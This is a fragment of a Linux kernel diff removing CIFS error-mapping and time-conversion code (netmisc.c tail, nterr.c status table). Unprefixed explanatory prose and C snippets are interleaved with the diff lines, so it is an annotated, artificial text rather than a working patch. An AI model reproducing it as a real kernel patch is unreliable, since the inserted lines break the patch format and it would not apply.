+-	ERRHRD, ERRgeneral, NT_STATUS_PWD_HISTORY_CONFLICT}, {
+-	ERRHRD, ERRgeneral, 0xc000025d}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PLUGPLAY_NO_DEVICE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNSUPPORTED_COMPRESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_HW_PROFILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH}, {
+-	ERRDOS, 182, NT_STATUS_DRIVER_ORDINAL_NOT_FOUND}, {
+-	ERRDOS, 127, NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND}, {
+-	ERRDOS, 288, NT_STATUS_RESOURCE_NOT_OWNED}, {
+-	ERRDOS, ErrTooManyLinks, NT_STATUS_TOO_MANY_LINKS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_LIST_INCONSISTENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_IS_OFFLINE}, {
+-	ERRDOS, 21, 0xc000026e}, {
+-	ERRDOS, 161, 0xc0000281}, {
+-	ERRDOS, ERRnoaccess, 0xc000028a}, {
+-	ERRDOS, ERRnoaccess, 0xc000028b}, {
+-	ERRHRD, ERRgeneral, 0xc000028c}, {
+-	ERRDOS, ERRnoaccess, 0xc000028d}, {
+-	ERRDOS, ERRnoaccess, 0xc000028e}, {
+-	ERRDOS, ERRnoaccess, 0xc000028f}, {
+-	ERRDOS, ERRnoaccess, 0xc0000290}, {
+-	ERRDOS, ERRbadfunc, 0xc000029c}, {
+-	ERRDOS, ERRsymlink, NT_STATUS_STOPPED_ON_SYMLINK}, {
+-	ERRDOS, ERRinvlevel, 0x007c0001}, {
+-	0, 0, 0 }
+-};
+-
+-/*****************************************************************************
+- Print an error message from the status code
+- *****************************************************************************/
+-static void
+-cifs_print_status(__u32 status_code)
+-{
+-	int idx = 0;
+-
+-	while (nt_errs[idx].nt_errstr != NULL) {
+-		if (((nt_errs[idx].nt_errcode) & 0xFFFFFF) ==
+-		    (status_code & 0xFFFFFF)) {
+-			pr_notice("Status code returned 0x%08x %s\n",
+-				  status_code, nt_errs[idx].nt_errstr);
+-		}
+-		idx++;
+-	}
+-	return;
+-}
+-
+-
+-static void
+-ntstatus_to_dos(__u32 ntstatus, __u8 *eclass, __u16 *ecode)
+-{
+-	int i;
+-	if (ntstatus == 0) {
+-		*eclass = 0;
+-		*ecode = 0;
+-		return;
+-	}
+-	for (i = 0; ntstatus_to_dos_map[i].ntstatus; i++) {
+-		if (ntstatus == ntstatus_to_dos_map[i].ntstatus) {
+-			*eclass = ntstatus_to_dos_map[i].dos_class;
+-			*ecode = ntstatus_to_dos_map[i].dos_code;
+-			return;
+-		}
+-	}
+-	*eclass = ERRHRD;
+-	*ecode = ERRgeneral;
+-}
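A worked trace of the two-stage translation: ntstatus_to_dos() maps NT_STATUS_ACCESS_DENIED to ERRDOS/ERRnoaccess via the table above, after which map_smb_to_linux_error() finds ERRnoaccess in mapping_table_ERRDOS[] and returns -EACCES; NT codes with no table entry fall back to ERRHRD/ERRgeneral and hence the default -EIO.

	__u8 class;
	__u16 code;

	ntstatus_to_dos(NT_STATUS_ACCESS_DENIED, &class, &code);
	/* class == ERRDOS, code == ERRnoaccess; mapping_table_ERRDOS[]
	 * then translates ERRnoaccess into the POSIX error -EACCES */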
+-
+-int
+-map_smb_to_linux_error(char *buf, bool logErr)
+-{
+-	struct smb_hdr *smb = (struct smb_hdr *)buf;
+-	unsigned int i;
+-	int rc = -EIO;	/* if transport error smb error may not be set */
+-	__u8 smberrclass;
+-	__u16 smberrcode;
+-
+-	/* BB if NT Status codes - map NT BB */
+-
+-	/* old style smb error codes */
+-	if (smb->Status.CifsError == 0)
+-		return 0;
+-
+-	if (smb->Flags2 & SMBFLG2_ERR_STATUS) {
+-		/* translate the newer STATUS codes to old style SMB errors
+-		 * and then to POSIX errors */
+-		__u32 err = le32_to_cpu(smb->Status.CifsError);
+-		if (logErr && (err != (NT_STATUS_MORE_PROCESSING_REQUIRED)))
+-			cifs_print_status(err);
+-		else if (cifsFYI & CIFS_RC)
+-			cifs_print_status(err);
+-		ntstatus_to_dos(err, &smberrclass, &smberrcode);
+-	} else {
+-		smberrclass = smb->Status.DosError.ErrorClass;
+-		smberrcode = le16_to_cpu(smb->Status.DosError.Error);
+-	}
+-
+-	/* old style errors */
+-
+-	/* DOS class smb error codes - map DOS */
+-	if (smberrclass == ERRDOS) {
+-		/* 1-byte field, no need to byte-reverse */
+-		for (i = 0;
+-		     i <
+-		     sizeof(mapping_table_ERRDOS) /
+-		     sizeof(struct smb_to_posix_error); i++) {
+-			if (mapping_table_ERRDOS[i].smb_err == 0)
+-				break;
+-			else if (mapping_table_ERRDOS[i].smb_err ==
+-								smberrcode) {
+-				rc = mapping_table_ERRDOS[i].posix_code;
+-				break;
+-			}
+-			/* else try next error mapping one to see if match */
+-		}
+-	} else if (smberrclass == ERRSRV) {
+-		/* server class of error codes */
+-		for (i = 0;
+-		     i <
+-		     sizeof(mapping_table_ERRSRV) /
+-		     sizeof(struct smb_to_posix_error); i++) {
+-			if (mapping_table_ERRSRV[i].smb_err == 0)
+-				break;
+-			else if (mapping_table_ERRSRV[i].smb_err ==
+-								smberrcode) {
+-				rc = mapping_table_ERRSRV[i].posix_code;
+-				break;
+-			}
+-			/* else try next error mapping to see if match */
+-		}
+-	}
+-	/* else ERRHRD class errors or junk  - return EIO */
+-
+-	cifs_dbg(FYI, "Mapping smb error code 0x%x to POSIX err %d\n",
+-		 le32_to_cpu(smb->Status.CifsError), rc);
+-
+-	/* generic corrective action e.g. reconnect SMB session on
+-	 * ERRbaduid could be added */
+-
+-	return rc;
+-}
+-
+-int
+-map_and_check_smb_error(struct mid_q_entry *mid, bool logErr)
+-{
+-	int rc;
+-	struct smb_hdr *smb = (struct smb_hdr *)mid->resp_buf;
+-
+-	rc = map_smb_to_linux_error((char *)smb, logErr);
+-	if (rc == -EACCES && !(smb->Flags2 & SMBFLG2_ERR_STATUS)) {
+-		/* possible ERRBaduid */
+-		__u8 class = smb->Status.DosError.ErrorClass;
+-		__u16 code = le16_to_cpu(smb->Status.DosError.Error);
+-
+-		/* switch can be used to handle different errors */
+-		if (class == ERRSRV && code == ERRbaduid) {
+-			cifs_dbg(FYI, "Server returned 0x%x, reconnecting session...\n",
+-				code);
+-			cifs_signal_cifsd_for_reconnect(mid->server, false);
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-
+-/*
+- * calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message
+- */
+-unsigned int
+-smbCalcSize(void *buf)
+-{
+-	struct smb_hdr *ptr = buf;
+-	return (sizeof(struct smb_hdr) + (2 * ptr->WordCount) +
+-		2 /* size of the bcc field */ + get_bcc(ptr));
+-}
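A worked instance of the formula above: a message with WordCount == 10 and a byte count (bcc) of 100 occupies sizeof(struct smb_hdr) + 2 * 10 + 2 + 100 bytes, i.e. the fixed header plus 122.

	/* hypothetical message: WordCount = 10, bcc = 100 */
	unsigned int len = sizeof(struct smb_hdr) + (2 * 10) + 2 + 100;
	/* == sizeof(struct smb_hdr) + 122 */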
+-
+-/* The following are taken from fs/ntfs/util.c */
+-
+-#define NTFS_TIME_OFFSET ((u64)(369*365 + 89) * 24 * 3600 * 10000000)
+-
+-/*
+- * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
+- * into Unix UTC (based 1970-01-01, in seconds).
+- */
+-struct timespec64
+-cifs_NTtimeToUnix(__le64 ntutc)
+-{
+-	struct timespec64 ts;
+-	/* BB what about the timezone? BB */
+-
+-	/* Subtract the NTFS time offset, then convert to 1s intervals. */
+-	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
+-	u64 abs_t;
+-
+-	/*
+-	 * Unfortunately we cannot use normal 64-bit division on a 32-bit arch;
+-	 * the alternative, do_div, does not work with negative numbers, so we
+-	 * have to special-case them.
+-	 */
+-	if (t < 0) {
+-		abs_t = -t;
+-		ts.tv_nsec = (time64_t)(do_div(abs_t, 10000000) * 100);
+-		ts.tv_nsec = -ts.tv_nsec;
+-		ts.tv_sec = -abs_t;
+-	} else {
+-		abs_t = t;
+-		ts.tv_nsec = (time64_t)do_div(abs_t, 10000000) * 100;
+-		ts.tv_sec = abs_t;
+-	}
+-
+-	return ts;
+-}
+-
+-/* Convert the Unix UTC into NT UTC. */
+-u64
+-cifs_UnixTimeToNT(struct timespec64 t)
+-{
+-	/* Convert to 100ns intervals and then add the NTFS time offset. */
+-	return (u64) t.tv_sec * 10000000 + t.tv_nsec/100 + NTFS_TIME_OFFSET;
+-}
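The NTFS_TIME_OFFSET constant used by both converters checks out by hand: 1601-01-01 to 1970-01-01 spans 369 years containing 89 leap days (92 multiples of 4 from 1604 through 1968, minus the non-leap century years 1700, 1800 and 1900), giving the well-known 11644473600 seconds scaled to 100 ns units. A standalone verification (illustrative):

#include <assert.h>
#include <stdint.h>

int main(void)
{
	/* 92 multiples of 4 in [1604, 1968], minus 1700, 1800 and 1900 */
	int leap_days = (1968 - 1604) / 4 + 1 - 3;	/* == 89 */
	uint64_t days = 369ULL * 365 + leap_days;	/* == 134774 */

	assert(days * 24 * 3600 == 11644473600ULL);
	/* days * 24 * 3600 * 10000000 == NTFS_TIME_OFFSET */
	return 0;
}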
+-
+-static const int total_days_of_prev_months[] = {
+-	0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334
+-};
+-
+-struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time, int offset)
+-{
+-	struct timespec64 ts;
+-	time64_t sec, days;
+-	int min, day, month, year;
+-	u16 date = le16_to_cpu(le_date);
+-	u16 time = le16_to_cpu(le_time);
+-	SMB_TIME *st = (SMB_TIME *)&time;
+-	SMB_DATE *sd = (SMB_DATE *)&date;
+-
+-	cifs_dbg(FYI, "date %d time %d\n", date, time);
+-
+-	sec = 2 * st->TwoSeconds;
+-	min = st->Minutes;
+-	if ((sec > 59) || (min > 59))
+-		cifs_dbg(VFS, "Invalid time min %d sec %lld\n", min, sec);
+-	sec += (min * 60);
+-	sec += 60 * 60 * st->Hours;
+-	if (st->Hours > 24)
+-		cifs_dbg(VFS, "Invalid hours %d\n", st->Hours);
+-	day = sd->Day;
+-	month = sd->Month;
+-	if (day < 1 || day > 31 || month < 1 || month > 12) {
+-		cifs_dbg(VFS, "Invalid date, month %d day: %d\n", month, day);
+-		day = clamp(day, 1, 31);
+-		month = clamp(month, 1, 12);
+-	}
+-	month -= 1;
+-	days = day + total_days_of_prev_months[month];
+-	days += 3652; /* account for difference in days between 1980 and 1970 */
+-	year = sd->Year;
+-	days += year * 365;
+-	days += (year/4); /* leap year */
+-	/* The generalized leap year calculation is more complex, i.e. no leap
+-	 year for years divisible by 100 unless also divisible by 400; but
+-	 since the maximum DOS year field is 2**7, the last year is 1980+127,
+-	 which means we need only consider 2 special-case years, i.e. 2000 and
+-	 2100, and only adjust for the missing leap year in 2100, as 2000 was
+-	 a leap year (divisible by 400) */
+-	if (year >= 120)  /* the year 2100 */
+-		days = days - 1;  /* do not count leap year for the year 2100 */
+-
+-	/* adjust for leap year where we are still before leap day */
+-	if (year != 120)
+-		days -= ((year & 0x03) == 0) && (month < 2 ? 1 : 0);
+-	sec += 24 * 60 * 60 * days;
+-
+-	ts.tv_sec = sec + offset;
+-
+-	/* cifs_dbg(FYI, "sec after cnvrt dos to unix time %d\n",sec); */
+-
+-	ts.tv_nsec = 0;
+-	return ts;
+-}
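The constant 3652 added in the function above is equally easy to verify: the DOS epoch (1980-01-01) trails the Unix epoch (1970-01-01) by ten 365-day years plus the two leap days of 1972 and 1976.

	/* days between 1970-01-01 and 1980-01-01 */
	int dos_epoch_delta = 10 * 365 + 2;	/* 1972 and 1976 => 3652 */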
+diff --git a/fs/cifs/nterr.c b/fs/cifs/nterr.c
+deleted file mode 100644
+index 358a766375b4a..0000000000000
+--- a/fs/cifs/nterr.c
++++ /dev/null
+@@ -1,674 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  Unix SMB/Netbios implementation.
+- *  Version 1.9.
+- *  RPC Pipe client / server routines
+- *  Copyright (C) Luke Kenneth Casson Leighton 1997-2001.
+- */
+-
+-/* NT error codes - see nterr.h */
+-#include <linux/types.h>
+-#include <linux/fs.h>
+-#include "nterr.h"
+-
+-const struct nt_err_code_struct nt_errs[] = {
+-	{"NT_STATUS_OK", NT_STATUS_OK},
+-	{"NT_STATUS_UNSUCCESSFUL", NT_STATUS_UNSUCCESSFUL},
+-	{"NT_STATUS_NOT_IMPLEMENTED", NT_STATUS_NOT_IMPLEMENTED},
+-	{"NT_STATUS_INVALID_INFO_CLASS", NT_STATUS_INVALID_INFO_CLASS},
+-	{"NT_STATUS_INFO_LENGTH_MISMATCH", NT_STATUS_INFO_LENGTH_MISMATCH},
+-	{"NT_STATUS_ACCESS_VIOLATION", NT_STATUS_ACCESS_VIOLATION},
+-	{"NT_STATUS_BUFFER_OVERFLOW", NT_STATUS_BUFFER_OVERFLOW},
+-	{"NT_STATUS_IN_PAGE_ERROR", NT_STATUS_IN_PAGE_ERROR},
+-	{"NT_STATUS_PAGEFILE_QUOTA", NT_STATUS_PAGEFILE_QUOTA},
+-	{"NT_STATUS_INVALID_HANDLE", NT_STATUS_INVALID_HANDLE},
+-	{"NT_STATUS_BAD_INITIAL_STACK", NT_STATUS_BAD_INITIAL_STACK},
+-	{"NT_STATUS_BAD_INITIAL_PC", NT_STATUS_BAD_INITIAL_PC},
+-	{"NT_STATUS_INVALID_CID", NT_STATUS_INVALID_CID},
+-	{"NT_STATUS_TIMER_NOT_CANCELED", NT_STATUS_TIMER_NOT_CANCELED},
+-	{"NT_STATUS_INVALID_PARAMETER", NT_STATUS_INVALID_PARAMETER},
+-	{"NT_STATUS_NO_SUCH_DEVICE", NT_STATUS_NO_SUCH_DEVICE},
+-	{"NT_STATUS_NO_SUCH_FILE", NT_STATUS_NO_SUCH_FILE},
+-	{"NT_STATUS_INVALID_DEVICE_REQUEST",
+-	 NT_STATUS_INVALID_DEVICE_REQUEST},
+-	{"NT_STATUS_END_OF_FILE", NT_STATUS_END_OF_FILE},
+-	{"NT_STATUS_WRONG_VOLUME", NT_STATUS_WRONG_VOLUME},
+-	{"NT_STATUS_NO_MEDIA_IN_DEVICE", NT_STATUS_NO_MEDIA_IN_DEVICE},
+-	{"NT_STATUS_UNRECOGNIZED_MEDIA", NT_STATUS_UNRECOGNIZED_MEDIA},
+-	{"NT_STATUS_NONEXISTENT_SECTOR", NT_STATUS_NONEXISTENT_SECTOR},
+-	{"NT_STATUS_MORE_PROCESSING_REQUIRED",
+-	 NT_STATUS_MORE_PROCESSING_REQUIRED},
+-	{"NT_STATUS_NO_MEMORY", NT_STATUS_NO_MEMORY},
+-	{"NT_STATUS_CONFLICTING_ADDRESSES",
+-	 NT_STATUS_CONFLICTING_ADDRESSES},
+-	{"NT_STATUS_NOT_MAPPED_VIEW", NT_STATUS_NOT_MAPPED_VIEW},
+-	{"NT_STATUS_UNABLE_TO_FREE_VM", NT_STATUS_UNABLE_TO_FREE_VM},
+-	{"NT_STATUS_UNABLE_TO_DELETE_SECTION",
+-	 NT_STATUS_UNABLE_TO_DELETE_SECTION},
+-	{"NT_STATUS_INVALID_SYSTEM_SERVICE",
+-	 NT_STATUS_INVALID_SYSTEM_SERVICE},
+-	{"NT_STATUS_ILLEGAL_INSTRUCTION", NT_STATUS_ILLEGAL_INSTRUCTION},
+-	{"NT_STATUS_INVALID_LOCK_SEQUENCE",
+-	 NT_STATUS_INVALID_LOCK_SEQUENCE},
+-	{"NT_STATUS_INVALID_VIEW_SIZE", NT_STATUS_INVALID_VIEW_SIZE},
+-	{"NT_STATUS_INVALID_FILE_FOR_SECTION",
+-	 NT_STATUS_INVALID_FILE_FOR_SECTION},
+-	{"NT_STATUS_ALREADY_COMMITTED", NT_STATUS_ALREADY_COMMITTED},
+-	{"NT_STATUS_ACCESS_DENIED", NT_STATUS_ACCESS_DENIED},
+-	{"NT_STATUS_BUFFER_TOO_SMALL", NT_STATUS_BUFFER_TOO_SMALL},
+-	{"NT_STATUS_OBJECT_TYPE_MISMATCH", NT_STATUS_OBJECT_TYPE_MISMATCH},
+-	{"NT_STATUS_NONCONTINUABLE_EXCEPTION",
+-	 NT_STATUS_NONCONTINUABLE_EXCEPTION},
+-	{"NT_STATUS_INVALID_DISPOSITION", NT_STATUS_INVALID_DISPOSITION},
+-	{"NT_STATUS_UNWIND", NT_STATUS_UNWIND},
+-	{"NT_STATUS_BAD_STACK", NT_STATUS_BAD_STACK},
+-	{"NT_STATUS_INVALID_UNWIND_TARGET",
+-	 NT_STATUS_INVALID_UNWIND_TARGET},
+-	{"NT_STATUS_NOT_LOCKED", NT_STATUS_NOT_LOCKED},
+-	{"NT_STATUS_PARITY_ERROR", NT_STATUS_PARITY_ERROR},
+-	{"NT_STATUS_UNABLE_TO_DECOMMIT_VM",
+-	 NT_STATUS_UNABLE_TO_DECOMMIT_VM},
+-	{"NT_STATUS_NOT_COMMITTED", NT_STATUS_NOT_COMMITTED},
+-	{"NT_STATUS_INVALID_PORT_ATTRIBUTES",
+-	 NT_STATUS_INVALID_PORT_ATTRIBUTES},
+-	{"NT_STATUS_PORT_MESSAGE_TOO_LONG",
+-	 NT_STATUS_PORT_MESSAGE_TOO_LONG},
+-	{"NT_STATUS_INVALID_PARAMETER_MIX",
+-	 NT_STATUS_INVALID_PARAMETER_MIX},
+-	{"NT_STATUS_INVALID_QUOTA_LOWER", NT_STATUS_INVALID_QUOTA_LOWER},
+-	{"NT_STATUS_DISK_CORRUPT_ERROR", NT_STATUS_DISK_CORRUPT_ERROR},
+-	{"NT_STATUS_OBJECT_NAME_INVALID", NT_STATUS_OBJECT_NAME_INVALID},
+-	{"NT_STATUS_OBJECT_NAME_NOT_FOUND",
+-	 NT_STATUS_OBJECT_NAME_NOT_FOUND},
+-	{"NT_STATUS_OBJECT_NAME_COLLISION",
+-	 NT_STATUS_OBJECT_NAME_COLLISION},
+-	{"NT_STATUS_HANDLE_NOT_WAITABLE", NT_STATUS_HANDLE_NOT_WAITABLE},
+-	{"NT_STATUS_PORT_DISCONNECTED", NT_STATUS_PORT_DISCONNECTED},
+-	{"NT_STATUS_DEVICE_ALREADY_ATTACHED",
+-	 NT_STATUS_DEVICE_ALREADY_ATTACHED},
+-	{"NT_STATUS_OBJECT_PATH_INVALID", NT_STATUS_OBJECT_PATH_INVALID},
+-	{"NT_STATUS_OBJECT_PATH_NOT_FOUND",
+-	 NT_STATUS_OBJECT_PATH_NOT_FOUND},
+-	{"NT_STATUS_OBJECT_PATH_SYNTAX_BAD",
+-	 NT_STATUS_OBJECT_PATH_SYNTAX_BAD},
+-	{"NT_STATUS_DATA_OVERRUN", NT_STATUS_DATA_OVERRUN},
+-	{"NT_STATUS_DATA_LATE_ERROR", NT_STATUS_DATA_LATE_ERROR},
+-	{"NT_STATUS_DATA_ERROR", NT_STATUS_DATA_ERROR},
+-	{"NT_STATUS_CRC_ERROR", NT_STATUS_CRC_ERROR},
+-	{"NT_STATUS_SECTION_TOO_BIG", NT_STATUS_SECTION_TOO_BIG},
+-	{"NT_STATUS_PORT_CONNECTION_REFUSED",
+-	 NT_STATUS_PORT_CONNECTION_REFUSED},
+-	{"NT_STATUS_INVALID_PORT_HANDLE", NT_STATUS_INVALID_PORT_HANDLE},
+-	{"NT_STATUS_SHARING_VIOLATION", NT_STATUS_SHARING_VIOLATION},
+-	{"NT_STATUS_QUOTA_EXCEEDED", NT_STATUS_QUOTA_EXCEEDED},
+-	{"NT_STATUS_INVALID_PAGE_PROTECTION",
+-	 NT_STATUS_INVALID_PAGE_PROTECTION},
+-	{"NT_STATUS_MUTANT_NOT_OWNED", NT_STATUS_MUTANT_NOT_OWNED},
+-	{"NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED",
+-	 NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED},
+-	{"NT_STATUS_PORT_ALREADY_SET", NT_STATUS_PORT_ALREADY_SET},
+-	{"NT_STATUS_SECTION_NOT_IMAGE", NT_STATUS_SECTION_NOT_IMAGE},
+-	{"NT_STATUS_SUSPEND_COUNT_EXCEEDED",
+-	 NT_STATUS_SUSPEND_COUNT_EXCEEDED},
+-	{"NT_STATUS_THREAD_IS_TERMINATING",
+-	 NT_STATUS_THREAD_IS_TERMINATING},
+-	{"NT_STATUS_BAD_WORKING_SET_LIMIT",
+-	 NT_STATUS_BAD_WORKING_SET_LIMIT},
+-	{"NT_STATUS_INCOMPATIBLE_FILE_MAP",
+-	 NT_STATUS_INCOMPATIBLE_FILE_MAP},
+-	{"NT_STATUS_SECTION_PROTECTION", NT_STATUS_SECTION_PROTECTION},
+-	{"NT_STATUS_EAS_NOT_SUPPORTED", NT_STATUS_EAS_NOT_SUPPORTED},
+-	{"NT_STATUS_EA_TOO_LARGE", NT_STATUS_EA_TOO_LARGE},
+-	{"NT_STATUS_NONEXISTENT_EA_ENTRY", NT_STATUS_NONEXISTENT_EA_ENTRY},
+-	{"NT_STATUS_NO_EAS_ON_FILE", NT_STATUS_NO_EAS_ON_FILE},
+-	{"NT_STATUS_EA_CORRUPT_ERROR", NT_STATUS_EA_CORRUPT_ERROR},
+-	{"NT_STATUS_FILE_LOCK_CONFLICT", NT_STATUS_FILE_LOCK_CONFLICT},
+-	{"NT_STATUS_LOCK_NOT_GRANTED", NT_STATUS_LOCK_NOT_GRANTED},
+-	{"NT_STATUS_DELETE_PENDING", NT_STATUS_DELETE_PENDING},
+-	{"NT_STATUS_CTL_FILE_NOT_SUPPORTED",
+-	 NT_STATUS_CTL_FILE_NOT_SUPPORTED},
+-	{"NT_STATUS_UNKNOWN_REVISION", NT_STATUS_UNKNOWN_REVISION},
+-	{"NT_STATUS_REVISION_MISMATCH", NT_STATUS_REVISION_MISMATCH},
+-	{"NT_STATUS_INVALID_OWNER", NT_STATUS_INVALID_OWNER},
+-	{"NT_STATUS_INVALID_PRIMARY_GROUP",
+-	 NT_STATUS_INVALID_PRIMARY_GROUP},
+-	{"NT_STATUS_NO_IMPERSONATION_TOKEN",
+-	 NT_STATUS_NO_IMPERSONATION_TOKEN},
+-	{"NT_STATUS_CANT_DISABLE_MANDATORY",
+-	 NT_STATUS_CANT_DISABLE_MANDATORY},
+-	{"NT_STATUS_NO_LOGON_SERVERS", NT_STATUS_NO_LOGON_SERVERS},
+-	{"NT_STATUS_NO_SUCH_LOGON_SESSION",
+-	 NT_STATUS_NO_SUCH_LOGON_SESSION},
+-	{"NT_STATUS_NO_SUCH_PRIVILEGE", NT_STATUS_NO_SUCH_PRIVILEGE},
+-	{"NT_STATUS_PRIVILEGE_NOT_HELD", NT_STATUS_PRIVILEGE_NOT_HELD},
+-	{"NT_STATUS_INVALID_ACCOUNT_NAME", NT_STATUS_INVALID_ACCOUNT_NAME},
+-	{"NT_STATUS_USER_EXISTS", NT_STATUS_USER_EXISTS},
+-	{"NT_STATUS_NO_SUCH_USER", NT_STATUS_NO_SUCH_USER},
+-	{"NT_STATUS_GROUP_EXISTS", NT_STATUS_GROUP_EXISTS},
+-	{"NT_STATUS_NO_SUCH_GROUP", NT_STATUS_NO_SUCH_GROUP},
+-	{"NT_STATUS_MEMBER_IN_GROUP", NT_STATUS_MEMBER_IN_GROUP},
+-	{"NT_STATUS_MEMBER_NOT_IN_GROUP", NT_STATUS_MEMBER_NOT_IN_GROUP},
+-	{"NT_STATUS_LAST_ADMIN", NT_STATUS_LAST_ADMIN},
+-	{"NT_STATUS_WRONG_PASSWORD", NT_STATUS_WRONG_PASSWORD},
+-	{"NT_STATUS_ILL_FORMED_PASSWORD", NT_STATUS_ILL_FORMED_PASSWORD},
+-	{"NT_STATUS_PASSWORD_RESTRICTION", NT_STATUS_PASSWORD_RESTRICTION},
+-	{"NT_STATUS_LOGON_FAILURE", NT_STATUS_LOGON_FAILURE},
+-	{"NT_STATUS_ACCOUNT_RESTRICTION", NT_STATUS_ACCOUNT_RESTRICTION},
+-	{"NT_STATUS_INVALID_LOGON_HOURS", NT_STATUS_INVALID_LOGON_HOURS},
+-	{"NT_STATUS_INVALID_WORKSTATION", NT_STATUS_INVALID_WORKSTATION},
+-	{"NT_STATUS_PASSWORD_EXPIRED", NT_STATUS_PASSWORD_EXPIRED},
+-	{"NT_STATUS_ACCOUNT_DISABLED", NT_STATUS_ACCOUNT_DISABLED},
+-	{"NT_STATUS_NONE_MAPPED", NT_STATUS_NONE_MAPPED},
+-	{"NT_STATUS_TOO_MANY_LUIDS_REQUESTED",
+-	 NT_STATUS_TOO_MANY_LUIDS_REQUESTED},
+-	{"NT_STATUS_LUIDS_EXHAUSTED", NT_STATUS_LUIDS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_SUB_AUTHORITY",
+-	 NT_STATUS_INVALID_SUB_AUTHORITY},
+-	{"NT_STATUS_INVALID_ACL", NT_STATUS_INVALID_ACL},
+-	{"NT_STATUS_INVALID_SID", NT_STATUS_INVALID_SID},
+-	{"NT_STATUS_INVALID_SECURITY_DESCR",
+-	 NT_STATUS_INVALID_SECURITY_DESCR},
+-	{"NT_STATUS_PROCEDURE_NOT_FOUND", NT_STATUS_PROCEDURE_NOT_FOUND},
+-	{"NT_STATUS_INVALID_IMAGE_FORMAT", NT_STATUS_INVALID_IMAGE_FORMAT},
+-	{"NT_STATUS_NO_TOKEN", NT_STATUS_NO_TOKEN},
+-	{"NT_STATUS_BAD_INHERITANCE_ACL", NT_STATUS_BAD_INHERITANCE_ACL},
+-	{"NT_STATUS_RANGE_NOT_LOCKED", NT_STATUS_RANGE_NOT_LOCKED},
+-	{"NT_STATUS_DISK_FULL", NT_STATUS_DISK_FULL},
+-	{"NT_STATUS_SERVER_DISABLED", NT_STATUS_SERVER_DISABLED},
+-	{"NT_STATUS_SERVER_NOT_DISABLED", NT_STATUS_SERVER_NOT_DISABLED},
+-	{"NT_STATUS_TOO_MANY_GUIDS_REQUESTED",
+-	 NT_STATUS_TOO_MANY_GUIDS_REQUESTED},
+-	{"NT_STATUS_GUIDS_EXHAUSTED", NT_STATUS_GUIDS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_ID_AUTHORITY", NT_STATUS_INVALID_ID_AUTHORITY},
+-	{"NT_STATUS_AGENTS_EXHAUSTED", NT_STATUS_AGENTS_EXHAUSTED},
+-	{"NT_STATUS_INVALID_VOLUME_LABEL", NT_STATUS_INVALID_VOLUME_LABEL},
+-	{"NT_STATUS_SECTION_NOT_EXTENDED", NT_STATUS_SECTION_NOT_EXTENDED},
+-	{"NT_STATUS_NOT_MAPPED_DATA", NT_STATUS_NOT_MAPPED_DATA},
+-	{"NT_STATUS_RESOURCE_DATA_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_DATA_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_TYPE_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_TYPE_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_NAME_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_NAME_NOT_FOUND},
+-	{"NT_STATUS_ARRAY_BOUNDS_EXCEEDED",
+-	 NT_STATUS_ARRAY_BOUNDS_EXCEEDED},
+-	{"NT_STATUS_FLOAT_DENORMAL_OPERAND",
+-	 NT_STATUS_FLOAT_DENORMAL_OPERAND},
+-	{"NT_STATUS_FLOAT_DIVIDE_BY_ZERO", NT_STATUS_FLOAT_DIVIDE_BY_ZERO},
+-	{"NT_STATUS_FLOAT_INEXACT_RESULT", NT_STATUS_FLOAT_INEXACT_RESULT},
+-	{"NT_STATUS_FLOAT_INVALID_OPERATION",
+-	 NT_STATUS_FLOAT_INVALID_OPERATION},
+-	{"NT_STATUS_FLOAT_OVERFLOW", NT_STATUS_FLOAT_OVERFLOW},
+-	{"NT_STATUS_FLOAT_STACK_CHECK", NT_STATUS_FLOAT_STACK_CHECK},
+-	{"NT_STATUS_FLOAT_UNDERFLOW", NT_STATUS_FLOAT_UNDERFLOW},
+-	{"NT_STATUS_INTEGER_DIVIDE_BY_ZERO",
+-	 NT_STATUS_INTEGER_DIVIDE_BY_ZERO},
+-	{"NT_STATUS_INTEGER_OVERFLOW", NT_STATUS_INTEGER_OVERFLOW},
+-	{"NT_STATUS_PRIVILEGED_INSTRUCTION",
+-	 NT_STATUS_PRIVILEGED_INSTRUCTION},
+-	{"NT_STATUS_TOO_MANY_PAGING_FILES",
+-	 NT_STATUS_TOO_MANY_PAGING_FILES},
+-	{"NT_STATUS_FILE_INVALID", NT_STATUS_FILE_INVALID},
+-	{"NT_STATUS_ALLOTTED_SPACE_EXCEEDED",
+-	 NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
+-	{"NT_STATUS_INSUFFICIENT_RESOURCES",
+-	 NT_STATUS_INSUFFICIENT_RESOURCES},
+-	{"NT_STATUS_DFS_EXIT_PATH_FOUND", NT_STATUS_DFS_EXIT_PATH_FOUND},
+-	{"NT_STATUS_DEVICE_DATA_ERROR", NT_STATUS_DEVICE_DATA_ERROR},
+-	{"NT_STATUS_DEVICE_NOT_CONNECTED", NT_STATUS_DEVICE_NOT_CONNECTED},
+-	{"NT_STATUS_DEVICE_POWER_FAILURE", NT_STATUS_DEVICE_POWER_FAILURE},
+-	{"NT_STATUS_FREE_VM_NOT_AT_BASE", NT_STATUS_FREE_VM_NOT_AT_BASE},
+-	{"NT_STATUS_MEMORY_NOT_ALLOCATED", NT_STATUS_MEMORY_NOT_ALLOCATED},
+-	{"NT_STATUS_WORKING_SET_QUOTA", NT_STATUS_WORKING_SET_QUOTA},
